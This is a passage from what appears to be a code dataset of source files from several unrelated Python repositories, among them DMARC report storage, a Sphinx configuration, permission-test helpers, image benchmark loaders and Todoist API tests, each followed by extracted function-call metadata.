count INTEGER,
PRIMARY KEY (report_id, record_id)
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS spf_results (
report_id TEXT,
record_id INTEGER,
spf_id INTEGER,
domain TEXT,
result TEXT,
PRIMARY KEY (report_id, record_id, spf_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE
);""")
self._cur.execute("""CREATE TABLE IF NOT EXISTS dkim_signatures (
report_id TEXT,
record_id INTEGER,
signature_id INTEGER,
domain TEXT,
result TEXT,
selector TEXT,
PRIMARY KEY (report_id, record_id, signature_id),
FOREIGN KEY (report_id, record_id)
REFERENCES dmarc_records(report_id, record_id)
ON DELETE CASCADE,
CONSTRAINT unique_dkim_sig
UNIQUE (report_id, record_id, domain, result, selector)
);""")
def _delete_all_data(self):
# Drop the tables in the right order:
self._cur.execute("DROP TABLE dkim_signatures;")
self._cur.execute("DROP TABLE spf_results;")
self._cur.execute("DROP TABLE dmarc_records;")
self._cur.execute("DROP TABLE dmarc_reports;")
# Recreate them again, empty:
self._init_database()
def _close_connection(self):
self._conn.close()
self._conn = None
def report_already_exists(self, report_filename):
# Check if a report with that filename already exists:
self._cur.execute("SELECT report_filename FROM dmarc_reports WHERE report_filename=?;", (report_filename,))
already_exists = self._cur.fetchone() is not None
return already_exists
def save_new_report(self, report):
# Persist the report itself:
self._cur.execute("INSERT INTO dmarc_reports VALUES (?,?,?,?,?);",
[report.id, report.receiver, report.filename,
totimestamp(report.start_date), totimestamp(report.end_date)])
# Persist each record of that report with a generated ID:
for rec_id, rec in enumerate(report.records):
self._cur.execute("INSERT INTO dmarc_records VALUES (?,?,?,?,?,?,?,?,?,?,?);",
[report.id, rec_id, rec.ip, rec.host, rec.disposition, rec.reason,
rec.spf_pass, rec.dkim_pass, rec.header_from, rec.envelope_from,
rec.count])
# Persist the SPF data:
for spf_id, spf_result in enumerate(rec.spf_results):
self._cur.execute("INSERT INTO spf_results VALUES (?,?,?,?,?);",
[report.id, rec_id, spf_id, spf_result["domain"], spf_result["result"]])
# Persist all the DKIM signatures with generated IDs
for sig_id, sig in enumerate(rec.dkim_signatures):
self._cur.execute("INSERT INTO dkim_signatures VALUES (?,?,?,?,?,?);",
[report.id, rec_id, sig_id, sig["domain"], sig["result"], sig["selector"]])
def get_reporting_start_date(self):
self._cur.execute("SELECT min(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_reporting_end_date(self):
self._cur.execute("SELECT max(report_start) FROM dmarc_reports;")
return datetime.datetime.utcfromtimestamp(self._cur.fetchone()[0])
def get_number_reports(self):
self._cur.execute("SELECT count(*) FROM dmarc_reports;")
return self._cur.fetchone()[0]
def get_count_by_disposition(self):
self._cur.execute("SELECT disposition, sum(count) FROM dmarc_records GROUP BY disposition;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_hostnames(self):
self._cur.execute("SELECT hostname, ip_address, sum(count) FROM dmarc_records GROUP BY hostname, ip_address;")
return {str(r[0]) if r[0] is not None else str(r[1]): r[2] for r in self._cur.fetchall()}
def get_count_by_receiver(self):
self._cur.execute("SELECT receiver, sum(count) FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id GROUP BY receiver;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_dkim_domain(self):
self._cur.execute("SELECT domain, sum(count) FROM dmarc_records JOIN dkim_signatures " +
"ON dmarc_records.report_id=dkim_signatures.report_id AND " +
"dmarc_records.record_id=dkim_signatures.record_id GROUP BY domain;")
return {str(r[0]): r[1] for r in self._cur.fetchall()}
def get_count_by_status_string(self):
self._cur.execute("SELECT spf_pass, dkim_pass, sum(count) FROM dmarc_records GROUP BY spf_pass, dkim_pass;")
status = {1: "pass", 0: "fail", None: "n/a"}
return {"SPF:%s, DKIM:%s" % (status[r[0]], status[r[1]]): r[2] for r in self._cur.fetchall()}
def get_raw_spf_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dkim_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, dkim_pass, count FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def get_raw_dmarc_status_count_by_timestamp(self):
self._cur.execute("SELECT report_start, spf_pass + dkim_pass, count " +
"FROM dmarc_reports JOIN dmarc_records " +
"ON dmarc_reports.report_id=dmarc_records.report_id;")
return self._cur.fetchall()
def execute_query(self, sql, values=None):
if values is not None:
self._cur.execute(sql, values)
else:
self._cur.execute(sql)
return self._cur.fetchall()
| [((20, 24, 20, 75), 'os.path.join', 'os.path.join', ({(20, 37, 20, 55): 'database_directory', (20, 57, 20, 74): 'database_filename'}, {}), '(database_directory, database_filename)', False, 'import os\n'), ((23, 21, 23, 51), 'sqlite3.connect', 'sqlite3.connect', ({(23, 37, 23, 50): 'database_path'}, {}), '(database_path)', False, 'import sqlite3\n'), ((21, 15, 21, 49), 'os.path.exists', 'os.path.exists', ({(21, 30, 21, 48): 'database_directory'}, {}), '(database_directory)', False, 'import os\n'), ((22, 12, 22, 43), 'os.makedirs', 'os.makedirs', ({(22, 24, 22, 42): 'database_directory'}, {}), '(database_directory)', False, 'import os\n'), ((13, 24, 13, 53), 'datetime.datetime', 'datetime.datetime', ({(13, 42, 13, 46): '(1970)', (13, 48, 13, 49): '(1)', (13, 51, 13, 52): '(1)'}, {}), '(1970, 1, 1)', False, 'import datetime\n')] |
mcdruid/sumologic-python-sdk | setup.py | cb1d649d0166976fb104866e9174a41bd558b817 | from setuptools import setup, find_packages
setup(
name="sumologic-sdk",
version="0.1.9",
packages=find_packages(),
install_requires=['requests>=2.2.1'],
# PyPI metadata
author="Yoway Buorn, Melchi Salins",
author_email="[email protected], [email protected]",
description="Sumo Logic Python SDK",
license="PSF",
keywords="sumologic python sdk rest api log management analytics logreduce splunk security siem collector forwarder",
url="https://github.com/SumoLogic/sumologic-python-sdk",
zip_safe=True
)
| [((6, 13, 6, 28), 'setuptools.find_packages', 'find_packages', ({}, {}), '()', False, 'from setuptools import setup, find_packages\n')] |
urm8/django-translations | docs/conf.py | e8f66710af9433044937b75c061e1988add398a5 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import json
import datetime
# `Django setup` below, will add the path to `translations` module
# automatically because it's been included in `project.settings`, so no need
# to import it here
# -- Django setup ------------------------------------------------------------
# generated project settings
import django
sys.path.insert(
0,
os.path.join(os.path.dirname(os.path.abspath('.')), 'project')
)
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.settings'
django.setup()
# -- Project information -----------------------------------------------------
with open(
os.path.join(
os.path.dirname(os.path.abspath('.')),
'config.json'
), 'r') as fh:
info = json.load(fh)
# project
project = info['project']['name']
# description
description = info['project']['desc']
# author
author = info['author']['name']
# The short X.Y version
version = info['release']['version']
# The full version, including alpha/beta/rc tags
release = info['release']['name']
# github
github_user = info['github']['user']
github_repo = info['github']['repo']
# donation
donate_url = info['urls']['funding']
# logo
logo = info['project']['logo']
# documentation
documentation = '{} {}'.format(project, 'Documentation')
# year
year = datetime.datetime.now().year
# copyright
copyright = '{year}, {author}'.format(year=year, author=author)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'monokai'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'note_bg': '#fec',
'note_border': '#ffe2a8',
'show_relbars': True,
'logo': logo,
'touch_icon': logo,
'logo_name': True,
'description': description,
'github_user': github_user,
'github_repo': github_repo,
'github_banner': True,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'DjangoTranslationsdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'DjangoTranslations.tex', documentation,
author, 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'djangotranslations', documentation,
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DjangoTranslations', documentation,
author, 'DjangoTranslations', description,
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/', None),
'django': ('http://django.readthedocs.org/en/latest/', None),
}
# -- Options for doctest extension -------------------------------------------
doctest_global_setup = """
import builtins
from django.db import connection
from django.test import TestCase
from sample.utils import create_samples
import beautifier
# Turn on the test database for the doctests
connection.creation.create_test_db(verbosity=0)
TestCase.setUpClass()
# Beautify `testoutput`
def print(value='', end='\\n'):
builtins.print(beautifier.beautify(value, False), end=end)
# Sample creation
def create_doc_samples(translations=True):
if translations:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
continent_fields=['name', 'denonym'],
country_fields=['name', 'denonym'],
city_fields=['name', 'denonym'],
langs=['de']
)
else:
create_samples(
continent_names=['europe', 'asia'],
country_names=['germany', 'south korea'],
city_names=['cologne', 'seoul'],
)
"""
doctest_global_cleanup = """
import builtins
from django.db import connection
from django.test import TestCase
# Normalize `testoutput`
def print(value='', end='\\n'):
builtins.print(value, end=end)
# Turn off the test database for the doctests
TestCase.tearDownClass()
connection.creation.destroy_test_db(verbosity=0)
"""
| [((34, 0, 34, 14), 'django.setup', 'django.setup', ({}, {}), '()', False, 'import django\n'), ((43, 11, 43, 24), 'json.load', 'json.load', ({(43, 21, 43, 23): 'fh'}, {}), '(fh)', False, 'import json\n'), ((75, 7, 75, 30), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((31, 33, 31, 53), 'os.path.abspath', 'os.path.abspath', ({(31, 49, 31, 52): '"""."""'}, {}), "('.')", False, 'import os\n'), ((40, 28, 40, 48), 'os.path.abspath', 'os.path.abspath', ({(40, 44, 40, 47): '"""."""'}, {}), "('.')", False, 'import os\n')] |
orchardbirds/skorecard-1 | skorecard/metrics/__init__.py | 0f5375a6c159bb35f4b62c5be75a742bf50885e2 | """Import required Metric."""
from .metrics import IV_scorer
__all__ = ["IV_scorer"]
| [] |
geant-multicloud/MCMS-mastermind | src/waldur_core/core/tests/helpers.py | 81333180f5e56a0bc88d7dad448505448e01f24e | import copy
from django.conf import settings
from django.test.utils import override_settings
from rest_framework import status, test
class PermissionsTest(test.APITransactionTestCase):
"""
Abstract class for permissions tests.
Methods `get_urls_configs`, `get_users_with_permission`,
`get_users_without_permissions` have to be overridden.
Logical example:
class ExamplePermissionsTest(PermissionsTest):
def get_users_with_permission(self, url, method):
if is_unreachable(url):
# no one can has access to unreachable url
return []
return [user_with_permission]
def get_users_without_permissions(self, url, method):
if is_unreachable(url):
# everybody does not have access to to unreachable url
return [user_with_permission, user_without_permission]
return [user_without_permission]
def get_urls_configs(self):
yield {'url': 'http://testserver/some/url, 'method': 'GET'}
yield {'url': 'http://testserver/some/unreachable/url', 'method': 'POST'}
...
"""
def get_urls_configs(self):
"""
Return list or generator of url configs.
Each url config is dictionary with such keys:
- url: url itself
- method: request method
- data: data which will be sent in request
url config example:
{
'url': 'http://testserver/api/backup/',
'method': 'POST',
'data': {'backup_source': 'backup/source/url'}
}
"""
raise NotImplementedError()
def get_users_with_permission(self, url, method):
"""
Return list of users which can access given url with given method
"""
raise NotImplementedError()
def get_users_without_permissions(self, url, method):
"""
Return list of users which can not access given url with given method
"""
raise NotImplementedError()
def test_permissions(self):
"""
Go through all url configs ands checks that user with permissions
can request them and users without - can't
"""
for conf in self.get_urls_configs():
url, method = conf['url'], conf['method']
data = conf['data'] if 'data' in conf else {}
for user in self.get_users_with_permission(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
self.assertFalse(
response.status_code
in (status.HTTP_403_FORBIDDEN, status.HTTP_404_NOT_FOUND),
'Error. User %s can not reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
for user in self.get_users_without_permissions(url, method):
self.client.force_authenticate(user=user)
response = getattr(self.client, method.lower())(url, data=data)
unreachable_statuses = (
status.HTTP_403_FORBIDDEN,
status.HTTP_404_NOT_FOUND,
status.HTTP_409_CONFLICT,
)
self.assertTrue(
response.status_code in unreachable_statuses,
'Error. User %s can reach url: %s (method:%s). (Response status code %s, data %s)'
% (user, url, method, response.status_code, response.data),
)
class ListPermissionsTest(test.APITransactionTestCase):
"""
Abstract class that tests what objects user receive in list.
Method `get_users_and_expected_results` has to be overridden.
Method `get_url` have to be defined.
"""
def get_url(self):
return None
def get_users_and_expected_results(self):
"""
Return list or generator of dictionaries with such keys:
- user - user which we want to test
- expected_results - list of dictionaries with fields which user has
to receive as answer from server
"""
pass
def test_list_permissions(self):
for user_and_expected_result in self.get_users_and_expected_results():
user = user_and_expected_result['user']
expected_results = user_and_expected_result['expected_results']
self.client.force_authenticate(user=user)
response = self.client.get(self.get_url())
self.assertEqual(
len(expected_results),
len(response.data),
'User %s receive wrong number of objects. Expected: %s, received %s'
% (user, len(expected_results), len(response.data)),
)
for actual, expected in zip(response.data, expected_results):
for key, value in expected.items():
self.assertEqual(actual[key], value)
def override_waldur_core_settings(**kwargs):
waldur_settings = copy.deepcopy(settings.WALDUR_CORE)
waldur_settings.update(kwargs)
return override_settings(WALDUR_CORE=waldur_settings)
| [((139, 22, 139, 57), 'copy.deepcopy', 'copy.deepcopy', ({(139, 36, 139, 56): 'settings.WALDUR_CORE'}, {}), '(settings.WALDUR_CORE)', False, 'import copy\n'), ((141, 11, 141, 57), 'django.test.utils.override_settings', 'override_settings', (), '', False, 'from django.test.utils import override_settings\n')] |
Gummary/denet | data/benchmark.py | 00d814d75eea54d5b259fce128ae7b625a900140 | """
CutBlur
Copyright 2020-present NAVER corp.
MIT license
"""
import os
import glob
import data
class BenchmarkSR(data.BaseDataset):
def __init__(self, phase, opt):
root = opt.dataset_root
self.scale = opt.scale
dir_HQ, dir_LQ = self.get_subdir()
self.HQ_paths = sorted(glob.glob(os.path.join(root, dir_HQ, "*.png")))
self.LQ_paths = sorted(glob.glob(os.path.join(root, dir_LQ, "*.png")))
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HR"
dir_LQ = "X{}".format(self.scale)
return dir_HQ, dir_LQ
class BenchmarkDN(BenchmarkSR):
def __init__(self, phase, opt):
self.sigma = opt.sigma
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.sigma)
return dir_HQ, dir_LQ
class BenchmarkJPEG(BenchmarkSR):
def __init__(self, phase, opt):
self.quality = opt.quality
super().__init__(phase, opt)
def get_subdir(self):
dir_HQ = "HQ"
dir_LQ = "{}".format(self.quality)
return dir_HQ, dir_LQ
| [((16, 41, 16, 76), 'os.path.join', 'os.path.join', ({(16, 54, 16, 58): 'root', (16, 60, 16, 66): 'dir_HQ', (16, 68, 16, 75): '"""*.png"""'}, {}), "(root, dir_HQ, '*.png')", False, 'import os\n'), ((17, 41, 17, 76), 'os.path.join', 'os.path.join', ({(17, 54, 17, 58): 'root', (17, 60, 17, 66): 'dir_LQ', (17, 68, 17, 75): '"""*.png"""'}, {}), "(root, dir_LQ, '*.png')", False, 'import os\n')] |
iTeam-co/pytglib | pytglib/api/types/update_chat_is_pinned.py | e5e75e0a85f89b77762209b32a61b0a883c0ae61 |
from ..utils import Object
class UpdateChatIsPinned(Object):
"""
A chat was pinned or unpinned
Attributes:
ID (:obj:`str`): ``UpdateChatIsPinned``
Args:
chat_id (:obj:`int`):
Chat identifier
is_pinned (:obj:`bool`):
New value of is_pinned
order (:obj:`int`):
New value of the chat order
Returns:
Update
Raises:
:class:`telegram.Error`
"""
ID = "updateChatIsPinned"
def __init__(self, chat_id, is_pinned, order, **kwargs):
self.chat_id = chat_id # int
self.is_pinned = is_pinned # bool
self.order = order # int
@staticmethod
def read(q: dict, *args) -> "UpdateChatIsPinned":
chat_id = q.get('chat_id')
is_pinned = q.get('is_pinned')
order = q.get('order')
return UpdateChatIsPinned(chat_id, is_pinned, order)
| [] |
jairhenrique/todoist-python | tests/test_api.py | 755b9bd8a4fdf4e96b2381613ac0c4bed99731e5 | import io
import time
import todoist
def test_stats_get(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
response = api.completed.get_stats()
assert 'days_items' in response
assert 'week_items' in response
assert 'karma_trend' in response
assert 'karma_last_update' in response
def test_user_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
date_format = api.state['user']['date_format']
date_format_new = 1 - date_format
api.user.update(date_format=date_format_new)
api.commit()
assert date_format_new == api.state['user']['date_format']
api.user.update_goals(vacation_mode=1)
api.commit()
api.user.update_goals(vacation_mode=0)
api.commit()
def test_user_settings_update(api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
reminder_email = api.state['user_settings']['reminder_email']
if reminder_email:
reminder_email = False
else:
reminder_email = True
api.user_settings.update(reminder_email=reminder_email)
api.commit()
assert reminder_email == api.state['user_settings']['reminder_email']
def test_project_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.delete()
response = api.commit()
assert response['projects'][0]['id'] == project1['id']
assert response['projects'][0]['is_deleted'] == 1
assert 'Project1' not in [p['name'] for p in api.state['projects']]
def test_project_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.update(name='UpdatedProject1')
response = api.commit()
assert response['projects'][0]['name'] == 'UpdatedProject1'
assert 'UpdatedProject1' in [p['name'] for p in api.state['projects']]
assert api.projects.get_by_id(project1['id']) == project1
project1.delete()
api.commit()
def test_project_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 1
assert 'Project1' in [p['name'] for p in api.state['projects']]
assert 1 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project1.archive()
api.commit()
project1.unarchive()
response = api.commit()
assert response['projects'][0]['name'] == 'Project1'
assert response['projects'][0]['is_archived'] == 0
assert 0 in [
p['is_archived'] for p in api.state['projects']
if p['id'] == project1['id']
]
project1.delete()
api.commit()
def test_project_move_to_parent(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
project2.move(project1['id'])
response = api.commit()
assert response['projects'][0]['name'] == 'Project2'
assert response['projects'][0]['parent_id'] == project1['id']
assert project1['id'] in [
i['parent_id'] for i in api.state['projects'] if i['id'] == project2['id']
]
project2.delete()
api.commit()
project1.delete()
api.commit()
def test_project_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
project1 = api.projects.add('Project1')
api.commit()
project2 = api.projects.add('Project2')
api.commit()
api.projects.reorder(projects=[
{'id': project1['id'], 'child_order': 2},
{'id': project2['id'], 'child_order': 1},
])
response = api.commit()
for project in response['projects']:
if project['id'] == project1['id']:
assert project['child_order'] == 2
if project['id'] == project2['id']:
assert project['child_order'] == 1
assert 2 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project1['id']
]
assert 1 in [
p['child_order'] for p in api.state['projects']
if p['id'] == project2['id']
]
project1.delete()
api.commit()
project2.delete()
api.commit()
def test_item_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
response = api.add_item('Item1')
assert response['content'] == 'Item1'
api.sync()
assert 'Item1' in [i['content'] for i in api.state['items']]
item1 = [i for i in api.state['items'] if i['content'] == 'Item1'][0]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.sync()
item1.delete()
response = api.commit()
assert response['items'][0]['id'] == item1['id']
assert response['items'][0]['is_deleted'] == 1
assert 'Item1' not in [i['content'] for i in api.state['items']]
def test_item_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item1.update(content='UpdatedItem1')
response = api.commit()
assert response['items'][0]['content'] == 'UpdatedItem1'
assert 'UpdatedItem1' in [i['content'] for i in api.state['items']]
assert api.items.get_by_id(item1['id']) == item1
item1.delete()
api.commit()
def test_item_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 1
assert 1 in [
i['checked'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_uncomplete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.uncomplete()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['checked'] == 0
assert 0 in [
i['checked'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_archive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 1
assert 1 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_unarchive(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2', parent_id=item1['id'])
api.commit()
item2.complete()
api.commit()
item2.archive()
api.commit()
item2.unarchive()
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['in_history'] == 0
assert 0 in [
i['in_history'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_move_to_project(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
project1 = api.projects.add('Project1')
api.commit()
item1.move(project_id=project1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item1'
assert response['items'][0]['project_id'] == project1['id']
assert project1['id'] in [
i['project_id'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
project1.delete()
api.commit()
def test_item_move_to_parent(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
item2.move(parent_id=item1['id'])
response = api.commit()
assert response['items'][0]['content'] == 'Item2'
assert response['items'][0]['parent_id'] == item1['id']
assert item1['id'] in [
i['parent_id'] for i in api.state['items'] if i['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_date_complete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1', due={'string': 'every day'})
api.commit()
now = time.time()
tomorrow = time.gmtime(now + 24 * 3600)
new_date_utc = time.strftime("%Y-%m-%dT%H:%M:%SZ", tomorrow)
due = {
'date': new_date_utc,
'string': 'every day',
}
api.items.update_date_complete(item1['id'], due=due)
response = api.commit()
assert response['items'][0]['due']['string'] == 'every day'
assert 'every day' in [
i['due']['string'] for i in api.state['items'] if i['id'] == item1['id']
]
item1.delete()
api.commit()
def test_item_reorder(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.reorder(items=[
{'id': item1['id'], 'child_order': 2},
{'id': item2['id'], 'child_order': 1},
])
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['child_order'] == 2
if item['id'] == item2['id']:
assert item['child_order'] == 1
assert 2 in [
p['child_order'] for p in api.state['items']
if p['id'] == item1['id']
]
assert 1 in [
p['child_order'] for p in api.state['items']
if p['id'] == item2['id']
]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_item_update_day_orders(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
item1 = api.items.add('Item1')
api.commit()
item2 = api.items.add('Item2')
api.commit()
api.items.update_day_orders({item1['id']: 1, item2['id']: 2})
response = api.commit()
for item in response['items']:
if item['id'] == item1['id']:
assert item['day_order'] == 1
if item['id'] == item2['id']:
assert item['day_order'] == 2
assert 1 == api.state['day_orders'][str(item1['id'])]
assert 2 == api.state['day_orders'][str(item2['id'])]
item1.delete()
api.commit()
item2.delete()
api.commit()
def test_label_add(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
response = api.commit()
assert response['labels'][0]['name'] == 'Label1'
assert 'Label1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_delete(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.delete()
response = api.commit()
assert response['labels'][0]['id'] == label1['id']
assert response['labels'][0]['is_deleted'] == 1
assert 'UpdatedLabel1' not in [l['name'] for l in api.state['labels']]
def test_label_update(cleanup, api_endpoint, api_token):
api = todoist.api.TodoistAPI(api_token, api_endpoint)
api.sync()
label1 = api.labels.add('Label1')
api.commit()
label1.update(name='UpdatedLabel1')
response = api.commit()
assert response['labels'][0]['name'] == 'UpdatedLabel1'
assert 'UpdatedLabel1' in [l['name'] for l in api.state['labels']]
assert api.labels.get_by_id(label1['id']) == label1
label1.delete()
api.commit()
def test_label_update_orders(cleanup, api_endpoint, api_token):
